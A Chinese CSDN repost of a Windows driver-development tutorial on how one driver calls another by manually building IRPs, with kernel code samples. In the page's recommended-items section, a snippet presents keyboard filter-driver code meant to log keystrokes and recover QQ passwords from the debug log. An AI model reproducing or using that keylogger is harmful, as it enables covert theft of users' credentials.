《Windows驱动开发技术详解》之驱动程序调用驱动程序——通过设备指针调用其他驱动程序...

最新推荐文章于 2022-10-15 21:46:27 发布
最新推荐文章于 2022-10-15 21:46:27 发布
阅读量225 收藏 3
点赞数
文章标签: 驱动开发 操作系统
原文链接:http://www.cnblogs.com/predator-wang/p/5591353.html
版权

本节介绍“手动”构造各个IRP,然后将IRP传递到相应驱动程序的派遣函数里。

  • 获得设备指针

每个内核中的句柄都会和一个内核对象的指针联系起来。ZwCreateFile内核函数可以通过设备名打开设备句柄,这个设备句柄和一个文件对象的指针关联。IoGetDeviceObjectPointer内核函数可以通过设备名获得文件对象指针,而不是获得设备句柄。当调用IoGetDeviceObjectPointer内核函数后,设备对象的引用计数就会加1。当用完这个设备对象后,应该调用ObDereferenceObject内核函数,使其引用计数减1。当第一次调用IoGetDeviceObjectPointer内核函数时,会根据设备名打开设备,这时文件对象指针的引用计数为1。此后如果再次调用IoGetDeviceObjectPointer打开设备,就不会真正的打开设备了,而只是将引用计数加1——只有在第一次真正打开设备时,系统才会创建一个IRP_MJ_CREATE类型的IRP,并将这个IRP传递到驱动程序的派遣函数中。

每次调用ObDereferenceObject内核函数都会将“引用计数”减1,如果减至0就会关闭设备关闭设备时,系统会创建一个IRP_MJ_CLOSE类型的IRP。

  •  创建IRP

利用内核函数IoBuildSynchronousFsdRequest和IoBuildAsynchronousFsdRequest两个内核函数创建IRP,它们分别用来创建同步类型和异步类型的IRP。这两个内核函数可以创建IRP_MJ_PNP、IRP_MJ_READ、IRP_MJ_WRITE、IRP_MJ_FLUSH_BUFFERS和IRP_MJ_SHUTDOWN类型的IRP。

可以通过IoBuildDeviceIoControlRequest内核函数创建IRP_MJ_INTERNAL_DEVICE_CONTROL和IRP_MJ_DEVICE_CONTROL两个类型的IRP,这个内核函数只能创建同步类型的IRP。

另外,还可以使用IoAllocateIrp内核函数,它可以创建任意类型的IRP。IoBuildSynchronousFsdRequest、IoBuildAsynchronousFsdRequest、IoBuildDeviceIoControlRequest这三个函数属于靠近上层的内核函数。而IoAllocateIrp是比较底层的内核函数,以上三个内核函数都是用过IoAllocateIrp实现的。

创建完IRP后,还要构造IRP的I/O堆栈,每层I/O堆栈对应一个设备对象。最后通过IoCallDriver内核函数调用相应的驱动。

手动创建IRP步骤如下:

1.先得到设备的指针。一种方法是用IoGetDeviceObjectPointer内核函数得到设备对象指针。另一种方法是用ZwCreate内核函数先得到设备句柄,然后调用ObReferenceObjectByPointer内核函数通过设备句柄得到设备对象指针。

2.手动创建IRP,有上述四个内核函数可选。

3.构造IRP的I/O堆栈。

4.调用IoCallDriver内核函数,其内部会调用设备对象的派遣函数。

  • 用IoBuildSynchronousFsdRequest创建IRP

IoBuildSynchronousFsdRequest内核函数创建同步类型IRP,关键在于其第六个参数Event。在调用IoBuildSynchronousFsdRequest之前,需要准备一个事件。这个事件会和IRP请求进行关联,当IRP请求被结束时该事件被触发。

示例代码如下:

 1 NTSTATUS HelloDDKRead_ManualIRP_SYN(PDEVICE_OBJECT pDevObj, PIRP pIrp){
 2     UNREFERENCED_PARAMETER(pDevObj);
 3     DbgPrint("Enter HelloDDKRead_ManualIRP_SYN!\n");
 4     NTSTATUS status = STATUS_SUCCESS;
 5     UNICODE_STRING DeviceName;
 6     RtlInitUnicodeString(&DeviceName, L"\\Device\\MyDDKDevice");
 7     PDEVICE_OBJECT pDeviceObject = NULL;
 8     PFILE_OBJECT pFileObject = NULL;
 9     //获得文件对象和设备对象的指针
10     status = IoGetDeviceObjectPointer(&DeviceName, FILE_ALL_ACCESS, &pFileObject, &pDeviceObject);
11     if (!NT_SUCCESS(status)){
12         status = STATUS_UNSUCCESSFUL;
13         pIrp->IoStatus.Status = status;
14         pIrp->IoStatus.Information = 0;
15         IoCompleteRequest(pIrp, IO_NO_INCREMENT);
16         return status;
17     }
18     KEVENT event;
19     KeInitializeEvent(&event, NotificationEvent, FALSE);
20     IO_STATUS_BLOCK status_block;
21     LARGE_INTEGER offset = RtlConvertLongToLargeInteger(0);
22     PIRP pNewIrp = IoBuildSynchronousFsdRequest(IRP_MJ_READ,
23         pDeviceObject,
24         NULL, 0,
25         &offset, &event,
26         &status_block);
27 
28     PIO_STACK_LOCATION stack = IoGetNextIrpStackLocation(pNewIrp);
29     stack->FileObject = pFileObject;
30     status = IoCallDriver(pDeviceObject, pNewIrp);
31     if (status == STATUS_PENDING){
32         status = KeWaitForSingleObject(&event,
33             Executive,
34             KernelMode,
35             FALSE,
36             NULL);
37         status = status_block.Status;
38     }
39 
40     ObDereferenceObject(pFileObject);
41     status = STATUS_SUCCESS;
42     pIrp->IoStatus.Status = status;
43     pIrp->IoStatus.Information = 0;
44     IoCompleteRequest(pIrp, IO_NO_INCREMENT);
45     DbgPrint("Leave HelloDDKRead_ManualIRP_SYN!\n");
46     return status;
47 }

运行结果如下:

  • 用IoBuildAsynchronousFsdRequest创建IRP

比用IoBuildSynchronousFsdRequest创建IRP少一个事件参数。使用IoBuildAsynchronousFsdRequest内核函数创建IRP,当IRP请求被结束后,操作系统不会通过事件进行通知。不过可以通过IRP的UserEvent子域来通知IRP请求的结束。调用IoBuildAsynchronousFsdRequest内核函数创建IRP后,如果希望进行同步处理,即希望得到IRP被结束的通知,则只需要设置IRP的子域UserEvent。

示例代码如下:

 

 1 NTSTATUS HelloDDKRead_ManualIRP_ASYN(PDEVICE_OBJECT pDevObj, PIRP pIrp){
 2     UNREFERENCED_PARAMETER(pDevObj);
 3     DbgPrint("Enter HelloDDKRead_ManualIRP_ASYN!\n");
 4     NTSTATUS status = STATUS_SUCCESS;
 5     UNICODE_STRING DeviceName;
 6     RtlInitUnicodeString(&DeviceName, L"\\Device\\MyDDKDevice");
 7     PDEVICE_OBJECT pDeviceObject = NULL;
 8     PFILE_OBJECT pFileObject = NULL;
 9     status = IoGetDeviceObjectPointer(&DeviceName, FILE_ALL_ACCESS, &pFileObject, &pDeviceObject);
10     if (!NT_SUCCESS(status)){
11         status = STATUS_UNSUCCESSFUL;
12         pIrp->IoStatus.Status = status;
13         pIrp->IoStatus.Information = 0;
14         IoCompleteRequest(pIrp, IO_NO_INCREMENT);
15         return status;
16     }
17     KEVENT event;
18     KeInitializeEvent(&event, NotificationEvent, FALSE);
19     IO_STATUS_BLOCK status_block;
20     LARGE_INTEGER offset = RtlConvertLongToLargeInteger(0);
21     PIRP pNewIrp = IoBuildAsynchronousFsdRequest(IRP_MJ_READ,
22         pDeviceObject,
23         NULL, 0,
24         &offset, &status_block);
25     pNewIrp->UserEvent = &event;
26     PIO_STACK_LOCATION stack = IoGetNextIrpStackLocation(pNewIrp);
27     stack->FileObject = pFileObject;
28     status = IoCallDriver(pDeviceObject, pNewIrp);
29     if (status == STATUS_PENDING){
30         status = KeWaitForSingleObject(&event,
31             Executive,
32             KernelMode,
33             FALSE,
34             NULL);
35         status = status_block.Status;
36     }
37     ObDereferenceObject(pFileObject);
38     status = STATUS_SUCCESS;
39     pIrp->IoStatus.Status = status;
40     pIrp->IoStatus.Information = 0;
41     IoCompleteRequest(pIrp, IO_NO_INCREMENT);
42     DbgPrint("Leave HelloDDKRead_ManualIRP_ASYN!\n");
43     return status;
44 }

运行结果如下:

  • 用IoAllocateIrp创建IRP

所有对设备的操作都会转化为一个IRP,IRP会在驱动程序中被处理。IRP请求被结束,就代表着对设备操作的结束,IRP的完成状态就是操作的完成状态。而所有的IRP最终都是由IoAllocateIrp内核函数创建的。

示例代码:

 1 NTSTATUS HelloDDKRead_ManualIRP(PDEVICE_OBJECT pDevObj, PIRP pIrp){
 2     UNREFERENCED_PARAMETER(pDevObj);
 3     DbgPrint("Enter HelloDDKRead_ManualIRP!\n");
 4     NTSTATUS status = STATUS_SUCCESS;
 5     UNICODE_STRING DeviceName;
 6     RtlInitUnicodeString(&DeviceName, L"\\Device\\MyDDKDevice");
 7     PDEVICE_OBJECT pDeviceObject = NULL;
 8     PFILE_OBJECT pFileObject = NULL;
 9     status = IoGetDeviceObjectPointer(&DeviceName, FILE_ALL_ACCESS, &pFileObject, &pDeviceObject);
10     if (!NT_SUCCESS(status)){
11         status = STATUS_UNSUCCESSFUL;
12         pIrp->IoStatus.Status = status;
13         pIrp->IoStatus.Information = 0;
14         IoCompleteRequest(pIrp, IO_NO_INCREMENT);
15         return status;
16     }
17 
18     KEVENT event;
19     KeInitializeEvent(&event, NotificationEvent, FALSE);
20     PIRP pNewIrp = IoAllocateIrp(pDeviceObject->StackSize, FALSE);
21     pNewIrp->UserEvent = &event;
22     IO_STATUS_BLOCK status_block;
23     pNewIrp->UserIosb = &status_block;
24     pNewIrp->Tail.Overlay.Thread = PsGetCurrentThread();
25     pNewIrp->AssociatedIrp.SystemBuffer = NULL;
26     PIO_STACK_LOCATION stack = IoGetNextIrpStackLocation(pNewIrp);
27     stack->MajorFunction = IRP_MJ_READ;
28     stack->MinorFunction = IRP_MN_NORMAL;
29     stack->FileObject = pFileObject;
30     status = IoCallDriver(pDeviceObject, pNewIrp);
31     if (status == STATUS_PENDING){
32         status = KeWaitForSingleObject(&event,
33             Executive,
34             KernelMode,
35             FALSE, NULL);
36     }
37     ObDereferenceObject(pFileObject);
38     status = STATUS_SUCCESS;
39     pIrp->IoStatus.Status = status;
40     pIrp->IoStatus.Information = 0;
41     IoCompleteRequest(pIrp, IO_NO_INCREMENT);
42     DbgPrint("Leave HelloDDKRead_ManualIRP!\n");
43     return status;
44 }

运行结果如下:

 

我这样验证了,返回的DeviceObject的指针就是返回的FileObject的成员:

输出结果:

转载于:https://www.cnblogs.com/predator-wang/p/5591353.html

weixin_30700099
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
QQ密码记录程序
05-15
http://blog.csdn.net/xiaoxiao108/article/details/7563159 最近看了看c++,写个程序玩玩。因为用户态代码不好截取到qq密码,写个键盘分层驱动。试了试效果还可以。 开发环境 vs2008 winddk ddkwizard windowsxp Dbgview 实现方法 1.把过滤驱动挂载到键盘驱动上面 2.设置完成例程 3.通过KdPrint输出键盘扫描码到DebugView 4. 从DebugView的日志文件中读出键盘按键。 具体代码 1.把过滤驱动挂载到KeyBoardClass0上面 PFILE_OBJECT fileOjbect; PDEVICE_OBJECT deviceObject; UNICODE_STRING deviceName; PDEVICE_EXTENSION pdx; PDEVICE_OBJECT filterDeviceObject; PDEVICE_OBJECT targetDevice; fileOjbect=NULL; RtlInitUnicodeString(&deviceName;,L"\\Device\\KeyBoardClass0"); status=IoGetDeviceObjectPointer(&deviceName;,FILE_ALL_ACCESS,&fileOjbect;,&deviceObject;); pdoDeviceObj->Flags |= DO_BUFFERED_IO; pdx=(PDEVICE_EXTENSION)pdoDeviceObj->DeviceExtension; pdx->pDevice=pdoDeviceObj; pdx->ustrDeviceName=usDeviceName; filterDeviceObject=((PDEVICE_EXTENSION)DriverObject->DeviceObject->DeviceExtension)->pDevice; targetDevice=IoAttachDeviceToDeviceStack(filterDeviceObject,deviceObject); ((PDEVICE_EXTENSION)DriverObject->DeviceObject->DeviceExtension)->TargetDevice=targetDevice; filterDeviceObject->DeviceType=targetDevice->DeviceType; filterDeviceObject->Characteristics=targetDevice->Characteristics; filterDeviceObject->Flags&=~DO_DEVICE_INITIALIZING; filterDeviceObject->Flags|=(targetDevice->Flags&(DO_DIRECT_IO|DO_BUFFERED_IO)); ObDereferenceObject(fileOjbect); return STATUS_SUCCESS; 2.设置完成例程 PDEVICE_EXTENSION pdx; pdx=(PDEVICE_EXTENSION)DeviceObject->DeviceExtension; IoCopyCurrentIrpStackLocationToNext(Irp); IoSetCompletionRoutine(Irp,MyIoCompletion,NULL,TRUE,TRUE,TRUE); NTSTATUS status=IoCallDriver(pdx->TargetDevice,Irp); return status; 3.输出键盘按键的扫描码 NTSTATUS MyIoCompletion(IN PDEVICE_OBJECT DeviceObject,IN PIRP Irp,IN PVOID Context) { if(NT_SUCCESS(Irp->IoStatus.Status)) { PKEYBOARD_INPUT_DATA keys = (PKEYBOARD_INPUT_DATA)Irp->AssociatedIrp.SystemBuffer; if(keys->Flags==0x0001||keys->Flags==0x0003) KdPrint(("x",keys->MakeCode)); } if(Irp->PendingReturned) { IoMarkIrpPending(Irp); } return STATUS_SUCCESS; } 使用步骤 1.安装驱动 用DriverMonitor加载并运行Driver1.sys驱动文件 2.打开Dbgview,当按键时就可以看到dbgview中记录下的键盘扫描码 3.在dbgview中选择记录日志文件,处理下日志文件就可以得到qq密码了。 偶c语言菜鸟,欢迎大神们批评教育 不足的地方很多啊 多多交流 谢谢 邮箱328452421@qq.com http://blog.csdn.net/xiaoxiao108/article/details/7563159
Windows驱动学习(二)-- 驱动层&应用层通信
安全杂货铺
09-18 9585
1. 概述 驱动是没有界面的,那么我们的程序(比如杀毒软件)如何与驱动进行交互呢?答案就是在Ring3层创建一个可视化的应用层程序,与驱动进行数据交换,达到通信的效果。 2. 驱动编写 2.1 初始化变量 2.2 DrvierEntry 为了能与应用层进行通信,我们需要创建一个虚拟的设备,然后创建一个符号与之关联,这些工作做完后,就可以将要与应用层交互的数据放置到设备的I/O堆栈中,供应用层进行...
IoGetDeviceObjectPointer
zacklin的专栏
04-16 6330
从名字获得设备对象 在知道一个设备名字的情况下,使用函数IoGetDeviceObjectPointer可以获得这个设备对象的指针。这个函数的原型如下: NTSTATUS IoGetDeviceObjectPointer( IN PUNICODE_STRING  ObjectName, IN ACCESS_MASK  DesiredAccess, OUT PFILE_OBJE
Windows 驱动开发 新手入门(四)
Doub1's Blog
06-21 2034
本篇文章介绍一下设备对象,这是写驱动过滤的基础,比如键盘,串口等等的过滤。是的缩写,直译就是物理设备对象,一般来说,就是在就是的设备对象。 只能返回设备对象地址。 指向包含 Unicode 字符串的缓冲区的指针,该字符串是设备对象的名称。 指定表示所需访问的。 通常 ,DesiredAccess指定FILE_READ_DATA。 不经常指定FILE_WRITE_DATA或FILE_ALL_ACCESS访问权限。 指向表示相应设备对象到用户模式代码的文件对象的指针(如果调用成功)。 指向表示命名逻辑、虚
windows驱动开发技术详解 加载和卸载.sys驱动程序的exe源代码.zip
01-28
"windows驱动开发技术详解 加载和卸载.sys驱动程序的exe源代码.zip"这个压缩包提供了关于Windows驱动开发的具体实践示例,包括加载和卸载驱动程序的.exe可执行文件以及源代码。 驱动开发主要涉及以下知识点: 1. *...
Windows驱动开发技术详解.rar
06-16
Windows操作系统中,驱动程序是连接硬件设备操作系统之间的桥梁,它们使得系统能够识别和管理硬件设备,提供必要的功能。Windows驱动开发是一项复杂且技术性强的工作,涉及到许多关键概念和技术。下面将对...
一个Linux设备驱动程序的简单示例
08-10
【Linux设备驱动程序详解设备驱动程序操作系统中扮演着至关重要的角色,它是连接硬件设备与应用程序的桥梁。系统调用作为操作系统内核与应用程序之间的接口,使得应用程序可以通过调用特定的系统调用来与硬件...
windows驱动开发技术详解-part2
07-06
 通用操作系统硬件驱动程序开发,编写者不仅需要精通硬件设备、计算机总线,而且需要Windows 操作系统知识以及调试技巧。学习和掌握Windows硬件驱动程序开发是电子系统设计人员必备的能力。  本书是作者结合...
最简单的驱动helloWDM
05-07
这是一个最简单的驱动程序,新手可以看一下。这是驱动的第一步!
windows驱动开发+exe调用驱动文件中的api
12-26
vc++ windows驱动开发+exe调用驱动文件中的api 用windows ddk编写windows驱动文件sys,再用visual c++编写exe调用驱动文件中的功能
emLinux设备驱动的程序开发.pdf
10-27
其中,设备驱动程序作为操作系统与硬件之间的重要桥梁,其开发技术成为了嵌入式开发人员必须掌握的核心技能之一。 #### 基于设备接口的Linux驱动程序 Linux内核通过一系列标准化接口来管理各种硬件设备,这种设计...
关于IoGetDeviceObjectPointer函数
danxuezx的专栏
06-14 2284
关于IoGetDeviceObjectPointer函数
Windows驱动开发技术详解》之驱动程序调用驱动程序——以文件句柄形式调用其它驱动程序...
weixin_38168081的博客
06-14 317
驱动程序开发中,经常需要一个驱动程序调用另一个驱动程序。例如,虚拟串口转USB设备驱动程序,这种驱动程序首先创建一个虚拟串口设备,对这个虚拟串口设备的读写请求会转发到一个USB设备上去。这时就需要在虚拟串口驱动程序调用USB驱动程序。 同步调用方法 本章节假设DriverA是将要被调用的目标驱动程序。 DriverB可以有多种方法调用DriverA,可以是同...
Window XP驱动开发(十六) 驱动程序调用驱动程序(通过设备指针
chenyujing1234的专栏
07-02 3601
转载请标明是引用于 http://blog.csdn.net/chenyujing1234  欢迎大家提出意见,一起讨论! 代码及EzDriverInstaller下载地址 : http://www.rayfile.com/zh-cn/files/9840cf8f-c41f-11e1-b25b-0015c55db73d/ (编译环境:VS2008+DDK库(参考:Window XP驱动
驱动中的C语言----指针指针初使化
weixin_30679823的博客
12-23 76
  在运用指针时,最多的错误就是指针的初始化。在程序中,一个未初始化的指针将会引起意想不到的问题。所以将指针初始化为NULL是个好习惯;在运用指针时,首先判断指针是否初始化,以防止指针指向一个未定义的地址。今天在写2.6内核的驱动时,就犯了这个问题。 1 #include <linux/module.h> 2 #include <linux/kernel.h> ...
windows 驱动与内核调试 学习
最新发布
不会写代码的丝丽
10-15 2341
一般驱动需要运行内核权限下运行(因为涉及硬件读取),比如Intel下的ring 0权限下。在windwos大量病毒和杀软为了特殊目的往往都是通过将自身升级为内核驱动方式进行运作。如果病毒程序首先进入ring 0理论上可以杀软将毫无作用。微软为了扼杀此类程序在windwo7 64位系统上会强制校验驱动程序签名,如果签名非微软认可将不会被加载。微软官方驱动学习指南。
Linux块设备驱动程序框架详解
"本文主要介绍了Linux块设备驱动程序框架,包括驱动程序的初始化和清除函数,以及块设备驱动数据结构的关键成员,如open(), release() 和 ioctl()。" 在Linux系统中,块设备驱动程序操作系统与硬件之间的重要桥梁...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值